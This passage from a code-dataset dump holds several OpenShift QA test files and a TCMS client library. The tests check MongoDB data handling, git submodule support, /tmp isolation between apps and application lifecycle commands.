get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5506030321121216, "alphanum_fraction": 0.5568956732749939, "avg_line_length": 41.377777099609375, "blob_id": "e5cc190e4c1d4a47a6e59da207a11e9d38a35546", "content_id": "0ba5d2faa43f0aea00e3b1da72697a418187be77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1907, "license_type": "no_license", "max_line_length": 227, "num_lines": 45, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/php/mongo.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Gear DNS: \".$_ENV['OPENSHIFT_GEAR_DNS'].\"<br />\";\n#$m = new Mongo(\"mongodb://#user:#passwd@#host:#port\");\n#$db = $m->#dbname;\n\n$m = new Mongo(\"mongodb://\".$_ENV['OPENSHIFT_MONGODB_DB_USERNAME'].\":\".$_ENV['OPENSHIFT_MONGODB_DB_PASSWORD'].\"@\".$_ENV['OPENSHIFT_MONGODB_DB_HOST'].\":\".$_ENV['OPENSHIFT_MONGODB_DB_PORT']);\n$db = $m->$_ENV['OPENSHIFT_APP_NAME'];\n\nif(!empty($_GET[\"action\"])) {\n echo \"MongoDB operations:<br />\";\n if($_GET[\"action\"] == \"insert\") {\n if(empty($_GET[\"size\"])) {\n $size = 500000;\n }\n else {\n $size = (int)$_GET[\"size\"];\n }\n echo \"db.data.insert({data: \\\"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\\\"})<br />\";\n for($i = 0; $i < $size; $i++) {\n $db->info->insert(array(\"data\" => \"This is testing data for testing snapshoting and restoring big data in mongodb database.This is testing data for testing snapshoting and restoring big data in mongodb database.\"));\n }\n echo (string)$size.\" records have been inserted into mongodb<br />\";\n }\n elseif($_GET[\"action\"] == \"delete\") {\n echo \"db.info.remove()<br />\";\n $db->info->remove();\n echo \"All the records have been deleted from mongodb database<br />\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n $cursor = $db->info->find();\n $num = $cursor->count();\n if($num > 0) {\n echo \"There are \".$num.\" records in database<br />Here's one record: \";\n $obj = $cursor->getNext();\n echo $obj[\"data\"].\"<br />\";\n }\n else {\n echo \"There is no record in database<br />\";\n }\n }\n else {\n echo \"[US2103][RT]Alter domain for a scaling php app which having mongodb added<br />\";\n }\n}\n?>\n" }, { "alpha_fraction": 0.6159572601318359, "alphanum_fraction": 0.6232105493545532, "avg_line_length": 37.52206039428711, "blob_id": "c342f26556e0aabd58d4778afa9c45b964728b8d", "content_id": "10ba4b0e4dc209cac3392aea9463ec32682e7334", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5239, "license_type": "no_license", "max_line_length": 166, "num_lines": 136, "path": "/automation/open/testmodules/RT/cartridge/git_submodule_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US619][Runtime][rhc-cartridge]git submodule support\nhttps://tcms.engineering.redhat.com/case/138336/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport random\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n #valid_variants = [\"jbossas\", \"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"wsgi\", \"perl\", \"diy\", \"nodejs\"]\n valid_variants = [\"jbosseap\", \"php\", \"ruby\", \"ruby-1.9\", \"python\", \"perl\", \"diy\"]\n random.seed()\n rand = int(random.random() * len(valid_variants))\n self.summary = \"[US619][Runtime][rhc-cartridge]git submodule support\"\n self.app_name = \"submodule\" + common.getRandomString(4)\n self.app_type = common.app_types[valid_variants[rand]]\n self.git_repo = \"./%s\" % (self.app_name)\n self.submodule_name = \"wolfcms-example\"\n self.submodule_repo = \"https://github.com/openshift/%s.git\" % (self.submodule_name)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass GitSubmoduleTest(OpenShiftTest):\n CODE = \"\"\"#!/usr/bin/env python\nimport os\nimport re\nimport sys\n\ngit_repo = os.path.abspath(os.environ['OPENSHIFT_REPO_DIR'])\n# Read from .gitmodules\ntry:\n f = file('%s/.gitmodules' % (git_repo), 'r')\n s = f.read()\n f.close()\nexcept:\n print('Failed to read %s/.gitmodules' % (git_repo))\n sys.exit(1)\n# Search for submodule's relative path\ntry:\n submodule_path = re.search(r'(?<=path = ).+$', s, re.M).group(0)\nexcept:\n print('Failed to find submodule dir path in .gitmodules')\n sys.exit(2)\n# Check if submodule's dir is empty\npath = '/'.join([git_repo, submodule_path])\nprint('The path of the submodule is:' + path)\ntry:\n lst = os.listdir(path)\nexcept:\n print('submodule dir %s does not exist' % path)\n sys.exit(3)\nif len(lst) == 0:\n print('Test Result: FAIL. git submodule update is not executed successfully on server')\n sys.exit(3)\nelse:\n print('Test Result: PASS. git submodule update is executed successfully on server')\n sys.exit(0)\"\"\"\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Add an public git repo as a submodule of the app\n cmd = \"cd %s && git submodule add %s\" % (self.git_repo, self.submodule_repo)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Failed to add submodule\")\n # Modify .openshift/action_hooks/pre_build\n try:\n f = file(\"%s/.openshift/action_hooks/pre_build\" % (self.git_repo), \"w\")\n f.write(GitSubmoduleTest.CODE)\n f.close()\n except IOError:\n return self.failed(\"Failed to write code to %s/.openshift/action_hooks/pre_build\" % (self.git_repo))\n except:\n self.error(\"Unknown error\")\n import traceback\n traceback.print_exc()\n return self.failed(\"%s failed\" % self.__class__.__name__)\n # Git push all the changes\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo)\n #expected_output = \"Test Result: PASS. git submodule update is executed successfully on server\"\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Git push failed\")\n #if output.find(expected_output) == -1:\n # return self.failed(\"%s failed\" % self.__class__.__name__)\n # Git clone the app's repo and pull down the submodule\n cmd = \"git clone %s %s-clone && cd %s-clone && git submodule init && git submodule update\" % (OSConf.get_git_url(self.app_name), self.app_name, self.app_name)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.debug(output)\n self.assert_equal(ret, 0, \"Failed to git clone the repo and pull down submodule\")\n # Check if the submodule is pulled down\n self.info(\"Checking dir: %s-clone/%s\" % (self.app_name, self.submodule_name))\n try:\n lst = os.listdir(\"%s-clone/%s\" % (self.app_name, self.submodule_name))\n except OSError:\n return self.failed(\"Failed to list files under %s-clone/%s. The dir may not exist\" % (self.git_repo, self.submodule_name))\n except:\n self.error(\"Unknown error\")\n import traceback\n traceback.print_exc()\n return self.failed(\"%s failed\" % self.__class__.__name__)\n if len(lst) == 0:\n return self.failed(\"The git submodule isn't pulled down\")\n else:\n self.info(\"The git submodule is successfully pulled down\")\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GitSubmoduleTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6006463766098022, "alphanum_fraction": 0.6200369596481323, "avg_line_length": 28.46258544921875, "blob_id": "6b861119335857a2ee9dbf08b3d31ebebbd984ef", "content_id": "1a3b0734bdc1efd4d51d5c8fa39e3be95b5dd0f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4332, "license_type": "no_license", "max_line_length": 128, "num_lines": 147, "path": "/automation/open/testmodules/RT/security/polyinstantiation_tmp_dir_git_push.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJianlin Liu\[email protected]\nDec 30, 2011\n[Security] Check polyinstantiation of /tmp and /var/tmp via git push\nhttps://tcms.engineering.redhat.com/case/122328/?from_plan=4962\n\"\"\"\n\nimport os\nimport sys\nimport re\n\nimport testcase\nimport common \nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[Security] Check polyinstantiation of /tmp and /var/tmp via git push\"\n self.app_type = \"python-2.6\"\n self.app_name1 = \"SecurityTestApp1\"\n self.app_name2 = \"SecurityTestApp2\"\n tcms_testcase_id=122328\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PolyinstantiantionTmpDirGitPush(OpenShiftTest):\n def test_method(self):\n self.info(\"1. Create a %s application\" %(self.app_type))\n ret = common.create_app(self.app_name1, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"%s app should be created successfully\" %(self.app_name1))\n\n def rewrite_app(target_file, context):\n print \"---Append test code to %s---\" %(target_file)\n file = open(target_file, \"a\")\n file.write(context)\n file.close()\n\n target_file = self.app_name1 + \"/setup.py\"\n test_code = \"\"\"\nimport commands\n \nf = open('/tmp/wsgi_tmp_test_git_push', 'w')\nf.write('testing')\nf.close()\n \nf = open('/var/tmp/wsgi_var_tmp_test_git_push', 'w')\nf.write('testing')\nf.close()\n \ncommand1 = \"ls -l /tmp/wsgi_tmp_test_git_push\"\nprint \"Command 1: %s\" %(command1)\n(ret1, output) = commands.getstatusoutput(command1)\nprint output\n \ncommand2 = \"ls -l /var/tmp/wsgi_var_tmp_test_git_push\"\nprint \"Command 2: %s\" %(command2)\n(ret2, output) = commands.getstatusoutput(command2)\nprint output\n \ncommand = \"ls -l /tmp\"\nprint \"Command: %s\" %(command)\n(tmp_ret, output) = commands.getstatusoutput(command)\nprint output\n \nif ret1 == 0 and ret2 == 0:\n print \"RESULT=0\"\nelse:\n print \"RESULT=1\"\n\"\"\"\n\n self.info(\"2. Modify setup.py\")\n rewrite_app(target_file, test_code)\n\n self.info(\"3.Do git commit\")\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name1))\n\n self.assert_equal(ret, 0)\n if (not re.search(r\"RESULT=0\", output)):\n self.assert_failed(\"Missing RESULT=0 in git output\")\n\n self.info(\"Create another application\")\n ret = common.create_app(self.app_name2, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True)\n self.assert_equal(ret, 0, \"%s app#2 should be created successfully\" %(self.app_name2))\n\n target_file = self.app_name2 + \"/setup.py\"\n test_code = \"\"\"\nimport commands\n \ncommand1 = \"ls -l /tmp/wsgi_tmp_test_git_push\"\nprint \"Command 1: %s\" %(command1)\n(ret1, output) = commands.getstatusoutput(command1)\nprint output\n \ncommand2 = \"ls -l /var/tmp/wsgi_var_tmp_test_git_push\"\nprint \"Command 2: %s\" %(command2)\n(ret2, output) = commands.getstatusoutput(command2)\nprint output\n \ncommand = \"ls -l /tmp\"\nprint \"Command: %s\" %(command)\n(tmp_ret, output) = commands.getstatusoutput(command)\nprint output\n \nif ret1 == 0 or ret2 == 0:\n print \"RESULT=0\"\nelse:\n print \"RESULT=1\"\n\"\"\"\n self.info(\"Modify setup.py\") \n rewrite_app(target_file, test_code)\n \n self.info(\"Do git commit\")\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . && git commit -m test && git push\" %(self.app_name2))\n\n self.assert_equal(ret, 0)\n if (not re.search(r\"RESULT=1\", output) or not re.search(r\"No such file or directory\", output)):\n self.assert_failed(\"Missing RESULT=0 in git output\")\n\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PolyinstantiantionTmpDirGitPush)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6335577964782715, "alphanum_fraction": 0.645903468132019, "avg_line_length": 25.984848022460938, "blob_id": "4bbf1690de16e1252e158afc169a369a2e3ff4a0", "content_id": "0758a540a19401aa99c9a66b0a1d15d5ff79e71a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1782, "license_type": "no_license", "max_line_length": 124, "num_lines": 66, "path": "/automation/open/testmodules/RT/cartridge/check_gears_rsync_at_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: Use rsync jenkins like deploy to move code and libraries between gears.py\n# Date: 2012/04/05 16:44\n# Author: [email protected]\n# [US2087][Runtime][rhc-cartridge]Use rsync jenkins like deploy to move code and libraries between gears\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\n#TODO: to accomplish\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, used `php` instead.\")\n self.app_type = 'php'\n\n common.env_setup()\n\n def finalize(self):\n os.sytem(\"rm -rf %s\"%self.app_name)\n\nclass CheckGearsRsyncAtJenkins(OpenShiftTest):\n def test_method(self):\n #\"Create a scalable application via REST API\",\n ret = common.create_scalable_app(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(0,ret)\n\n ret = common.scale_up(self.app_name)\n self.assert_equal(0,ret)\n\n self.summary =\"Scale up the app using REST API:\" \n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def edit_app(self):\n content='''<html> <body> <?php echo \"App DNS: \" . $_ENV[\"OPENSHIFT_GEAR_DNS\"] . \"<br />\"; ?> </body> </html> '''\n f = open(\"%s/php/index.php\"%self.app_name, \"w\")\n f.write(content)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckGearsRsyncAtJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.556612491607666, "alphanum_fraction": 0.5655707716941833, "avg_line_length": 45.269229888916016, "blob_id": "06fb8daacc4e1c4ad9b9734a6a7906285bf6f5ef", "content_id": "4be4a24be36cdaead6e006b776fea9f6cf07f4eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10828, "license_type": "no_license", "max_line_length": 146, "num_lines": 234, "path": "/automation/open/testmodules/RT/client/create_control_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport testcase, common, OSConf\nimport rhtest\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n print \"variant is not set. Running test with default `php`\"\n self.test_variant = 'jbossews'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = self.app_name\n if self.test_variant == \"jenkins\":\n self.good_str = \"<script>window.location.replace\"\n self.bad_str = \"Service Temporarily Unavailable\"\n elif self.test_variant == \"diy\":\n self.good_str = \"\"\n self.bad_str = \"\"\n else:\n self.good_str = \"Welcome to\"\n self.bad_str = \"Service Temporarily Unavailable\"\n tcms_testcase_id=146360,122407, 122371, 122315\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%self.app_name)\n\n\nclass CreateControlApp(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n self.steps_list.append(step)\n\n def verify(exp_str):\n if self.test_variant == \"jenkins\":\n proto = \"https\"\n else:\n proto = \"http\"\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s://%s\"%(proto,url), exp_str, options=\"-k -H 'Pragma: no-cache' -L \", count=4, delay=7)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0)\n self.steps_list.append(step)\n\n test_html = \"Welcome to OpenShift~_~\"\n type_to_cmd = {\n \"php-5.3\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/php/index.php\" % (test_html, self.git_repo),\n \"jbossas-7\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbosseap-6.0\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbossews-1.0\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"jbossews-2.0\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/src/main/webapp/index.html\" % (test_html, self.git_repo),\n \"nodejs-0.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/index.html\" % (test_html, self.git_repo),\n \"python-2.6\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"ruby-1.8\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/config.ru\" % (test_html, self.git_repo),\n \"perl-5.10\" : \"sed -i -e 's/Welcome to OpenShift/%s/g' %s/perl/index.pl\" % (test_html, self.git_repo),\n \"diy-0.1\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"zend-5.6\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"jenkins-1.4\" : \"echo %s >%s/testfile\" % (test_html, self.git_repo),\n \"python-2.7\" : \"sed -i -e 's/Welcome to Python-2.7/%s/g' %s/wsgi/application\" % (test_html, self.git_repo),\n \"python-3.3\" : \"sed -i -e 's/Welcome to Python-3.3/%s/g' %s/wsgi/application\" % (test_html, self.git_repo)\n }\n type_to_cmd[\"ruby-1.9\"] = type_to_cmd[\"ruby-1.8\"]\n cmd = type_to_cmd[self.app_type] + \" && cd %s && git add . && git commit -am t && git push\" % (self.git_repo)\n step = testcase.TestCaseStep(\"Make some changes in the git repo and git push\",\n cmd,\n expect_description=\"the git repo is modified successfully and git push succeeds\",\n expect_return=0)\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Check your change take effect\",\n verify,\n function_parameters=[test_html],\n expect_return=0)\n if self.test_variant in (\"diy\", \"jenkins\", \"zend\"):\n pass\n else:\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Stop this app\",\n \"rhc app stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be stopped successfully\",\n expect_return=0,\n expect_string_list=[\"%s stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Stop this app again\",\n \"rhc app stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be stopped successfully\",\n expect_return=0,\n expect_string_list=[\"%s stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is NOT available\",\n verify,\n function_parameters=[self.bad_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Start this app\",\n \"rhc app start %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be started successfully\",\n expect_return=0,\n expect_string_list=[\"%s started\" % (self.app_name)],\n try_count=3)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0,\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restart this app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be restarted successfully\",\n expect_return=0,\n expect_string_list=[\"%s restarted\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0,\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Force stop this app\",\n \"rhc app force-stop %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be force stopped successfully\",\n expect_return=0,\n expect_string_list=[\"%s force stopped\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is NOT available\",\n verify,\n function_parameters=[self.bad_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restart this app\",\n \"rhc app restart %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be restarted successfully\",\n expect_return=0,\n expect_string_list=[\"%s restarted\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n expect_return=0,\n function_parameters=[self.good_str],\n try_count=10,\n try_interval=12)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Reload this app\",\n \"rhc app reload %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"The app should be reloaded successfully\",\n expect_return=0,\n expect_string_list=[\"%s config reloaded\" % (self.app_name)])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app is available\",\n verify,\n function_parameters=[self.good_str],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Check this app's status\",\n \"rhc app show --state %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Delete this app\",\n common.destroy_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_description=\"The app should be deleted successfully\",\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Try to start this non-existing app\",\n \"rhc app start %s -l %s -p '%s' %s\" % (self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\")\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"Control %s application - start/restart/reload/stop/destroy/force-stop\" %(self.app_type), self.steps_list)\n\n try:\n case.run()\n except testcase.TestCaseStepFail as e:\n return self.failed(str(e))\n\n if case.testcase_status == 'PASSED':\n return self.passed()\n if case.testcase_status == 'FAILED':\n return self.failed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateControlApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.5712647438049316, "alphanum_fraction": 0.5834193229675293, "avg_line_length": 40.13679122924805, "blob_id": "98f28ef7b407ce7fa89f8fa9d945a5d58ae33b22", "content_id": "da83c013917e70e0337bfdd29f8165a6daa898ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8721, "license_type": "no_license", "max_line_length": 364, "num_lines": 212, "path": "/automation/open/lib/tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# [email protected]\n# [email protected]\n# 2012-01-05\n#\n\n#for XMLRPC check this site:\n#https://tcms.engineering.redhat.com/xmlrpc/\nimport nitrate\nfrom kerberos import GSSError\nimport clog\n\nrhtest_disposition_to_tcms_mapping = {'COMPLETED':'PAUSED', 'PASSED':'PASSED', 'FAILED':'FAILED', 'ABORT':'ERROR', 'SKIP':'WAIVED', 'INCOMPLETE' :'ERROR'}\n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n#tag_id_name_map = [{'id': 513, 'name': 'acceptance'}, {'id': 1310, 'name': 'rhc-cartridge'}, {'id': 1859, 'name': 'non_site'}, {'id': 1860, 'name': 'devenv'}, {'id': 1876, 'name': 'cartridge'}, {'id': 1882, 'name': 'standalone'}, {'id': 1785, 'name': 'sprint6'}, {'id': 1958, 'name': 'fedoraenv'}, {'id': 2082, 'name': 'fwtest5'}, {'id': 2087, 'name': 'fwtest6'}]\n\nclass TCMS(object):\n \"\"\"\n Base object for initializing connection to XML RPC\n \"\"\"\n def __init__(self, xmlrpc_obj=None):\n self.log = clog.get_logger()\n if xmlrpc_obj is None:\n try:\n self.conn = nitrate.NitrateKerbXmlrpc('https://tcms.engineering.redhat.com/xmlrpc/')\n self.conn.get_me()\n self.server = self.conn.server\n except nitrate.NitrateXmlrpcError as e:\n self.log.error(\"Unable to connect via XMLRPC service: %s\"%str(e))\n raise e\n except GSSError as e:\n self.log.error(\"Invalid kerberos ticket or hostname: %s\"%str(e))\n raise e\n #server_url = \"https://\"+LOGIN+\":\"+PASSWORD+'@'+XMLRPC_URL;\n #Create an object to represent our server.\n #self.server = xmlrpclib.ServerProxy(server_url);\n else:\n self.server = xmlrpc_obj\n\n\n def update_testcaserun_status(self, testcaserun_id, status):\n self.log.debug(\"Updating TestCaseRun - %s Status to %s ...\" %(testcaserun_id, status))\n return self.server.TestCaseRun.update([testcaserun_id], {'case_run_status' : CASE_RUN_STATUS[status]})\n\n def update_testcaserun_notes(self, testcaserun_id, notes):\n self.log.debug(\"Updating TestCaseRun Notes ...\")\n return self.server.TestCaseRun.update([testcaserun_id], {'notes' : notes})\n\n def update_testcaserun_testlog(self, testcaserun_id, name, url):\n self.log.debug(\"Updating TestCaseRun Comments ...\")\n return self.server.TestCaseRun.attach_log(testcaserun_id, name, url)\n\n def update_testcaserun_comments(self, testcaserun_id, comments):\n self.log.debug(\"Updating TestCaseRun Comments ...\")\n return self.server.TestCaseRun.add_comment(testcaserun_id, comments)\n\n def update_testcaserun(self, testcaserun_id, params):\n return self.server.TestCaseRun.update([testcaserun_id], params)\n\n\n def create_testrun(self,summary=None, build=1770, plan_id=4962, manager_id=2351, product=292, product_version=1212, status=0):\n \n self.testrun_values = {\n 'build' : build,\n 'plan' : plan_id,\n 'manager': manager_id,\n 'summary': summary,\n 'product': product,\n 'product_version' : product_version,\n 'status': status,\n }\n try:\n self.log.debug(\"Creating Test Run ...\")\n testrun = self.server.TestRun.create(self.testrun_values)\n self.testrun_id = testrun['run_id']\n self.log.info(\"TCMS Test Run - https://tcms.engineering.redhat.com/run/%s/ was sucessfully created.\" %(self.testrun_id))\n return testrun\n except Exception as e:\n raise TCMSException(\"ERROR[TCMS]: Couldn't create TestRun(%s) :: %s\" %(str(self.testrun_values), str(e)) )\n\n\n def get_testrun(self, testrun_id):\n try:\n return self.server.TestRun.get(testrun_id)\n except:\n raise TCMSException(\"ERROR[TCMS]: Test run %s does not exist\" % str(testrun_id))\n\n\n def add_testcase_to_run(self, testcase_id, testrun_id):\n self.log.debug(\"Adding test case with id - %s to test run %s\" %(testcase_id, testrun_id))\n try:\n self.server.TestCase.add_to_run(testcase_id, testrun_id) \n except Exception as e:\n self.log.warning(\"Duplicate entry attempted: Testcase %s already added to test run %s\" % (testcase_id, testrun_id))\n\n\n def get_testcase_from_run(self, testrun_id):\n try:\n return self.server.TestRun.get_test_cases(testrun_id)\n except:\n raise TCMSException(\"ERROR[TCMS': Failed to get testcases for testrun %s\" % str(testrun_id))\n\n get_testcase_by_run_id = get_testcase_from_run\n\n def reset_testrun(self, testrun_id, status=[]):\n \"\"\"\n Set all (if status==None) caseruns' status to IDLE\n \"\"\"\n testrun_cases = self.get_testcaseruns(testrun_id)\n caseruns2update = []\n for tcrun in testrun_cases:\n if status == None or len(status)==0 or tcrun['case_run_status'] in status:\n caseruns2update.append(tcrun['case_run_id'])\n try:\n self.server.TestCaseRun.update(caseruns2update, {'case_run_status': 1}) #1-IDLE\n except Exception as e:\n raise TCMSException(\"Unable to reset testrun[%s]: %s\" %(testrun_id, str(e)))\n\n def get_testcaseruns(self, testrun_id):\n try:\n return self.server.TestRun.get_test_case_runs(testrun_id, 0)\n except Exception as e:\n raise TCMSException(\"Unable to fetch testcaseruns from DB per testrun[%s]: %s\" %(testrun_id, str(e)))\n\n def get_testcaserun(self, testcase_id, testrun_id, build=None):\n if not build:\n build = self.get_testrun(testrun_id)[\"build_id\"]\n try:\n return self.server.TestCaseRun.get_s(testcase_id, testrun_id, build)\n except Exception as e:\n raise TCMSException(\"Test case not in this test run %d\" % testrun_id)\n\n def get_testcaserun_by_id(self, testcaserun_id):\n return self.server.TestCaseRun.get(testcaserun_id)\n\n\n def get_testcases(self, filter=None, 